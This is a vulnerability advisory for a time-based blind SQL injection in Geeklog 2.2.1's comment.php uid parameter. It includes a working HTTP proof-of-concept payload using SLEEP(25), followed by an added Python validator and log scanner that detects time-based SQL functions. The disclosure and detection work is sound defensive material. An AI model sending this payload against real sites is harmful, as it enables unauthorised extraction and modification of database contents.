Geeklog 2.2.1 Blind SQL Injection

Advisory ID: RO-20-002
Severity: Critical
Vendor: Geeklog
Product: Geeklog CMS
Version: 2.2.1


Overview

A Blind SQL Injection vulnerability exists in Geeklog CMS version 2.2.1. The vulnerability allows remote attackers to execute arbitrary SQL commands via the uid parameter in comment.php.


Vulnerability Details

Affected Versions: 2.2.1 and earlier

Location: comment.php

Affected Parameter: uid

Root Cause: Insufficient input validation on the uid parameter allows SQL Injection attacks.


Exploitation Requirements

No authentication required
Direct access to the comment endpoint

Impact

Remote attackers can exploit this vulnerability to:

Extract sensitive data from the database
Bypass authentication mechanisms
Modify or delete database content

Proof of Concept

POST /geeklog-2.2.1/public_html/comment.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

uid=2+++((SELECT+1+FROM+(SELECT+SLEEP(25))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR"*/

Time-based Blind SQL Injection: if the server's response to this request is delayed by about 25 seconds, the uid parameter is being evaluated by the database and the target is vulnerable.


Solution

Upgrade to a patched version of Geeklog that includes proper input sanitization and parameterized queries.
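The following is an added example, not code from the advisory or from the Geeklog project. It shows the two defensive points above in one place: a strict integer check for uid (the input validation the fix needs) and a small scanner that URL-decodes the uid parameter of comment.php requests from constructed log lines and flags values carrying time-based markers such as the SLEEP(25) payload in the proof of concept. The log line format is assumed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed sample log lines in an assumed "METHOD PATH QUERY-OR-BODY" shape
# (not Geeklog's or any web server's real format). Line 2 is the advisory's payload.
SAMPLE_LOG = [
    'POST /geeklog-2.2.1/public_html/comment.php uid=2&mode=view',
    r'''POST /geeklog-2.2.1/public_html/comment.php uid=2+++((SELECT+1+FROM+(SELECT+SLEEP(25))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR"*/''',
    'GET /geeklog-2.2.1/public_html/article.php story=hello',
]

# Functions used for time-based blind SQL injection across common databases,
# matched on the decoded value (after '+' and %xx have become plain characters).
TIME_BASED = re.compile(r'\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR)\b', re.IGNORECASE)


def is_valid_uid(raw: str) -> bool:
    """Mitigation side: a user id is a plain ASCII decimal integer and nothing else.
    str.isdigit() is deliberately avoided because it accepts non-ASCII digits."""
    return re.fullmatch(r'[0-9]+', raw) is not None


def classify_uid(raw: str) -> str:
    """Return 'ok', 'time-based-sqli' or 'malformed' for one decoded uid value."""
    if is_valid_uid(raw):
        return 'ok'
    if TIME_BASED.search(raw):
        return 'time-based-sqli'
    return 'malformed'


def scan_log(lines):
    """Detection side: flag comment.php requests whose uid is not a plain integer.
    Returns a list of (line_number, verdict, decoded_uid) tuples."""
    findings = []
    for n, line in enumerate(lines, 1):
        try:
            _method, path, query = line.split(' ', 2)
        except ValueError:
            continue  # not in the assumed three-field shape
        if not path.endswith('/comment.php'):
            continue
        # parse_qs turns '+' into spaces and decodes %xx, so the SQL becomes visible
        for uid in parse_qs(query, keep_blank_values=True).get('uid', []):
            verdict = classify_uid(uid)
            if verdict != 'ok':
                findings.append((n, verdict, uid))
    return findings


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A request whose decoded uid fails is_valid_uid should be rejected before any query is built; the scanner is for reviewing historical traffic for the pattern, and pairing it with response-time data makes the 25-second delay itself a second signal.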


References

Invicti Advisory NS-20-002

Timeline:

[2020-01-01] - Discovered

Credits: Omar Kurt
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸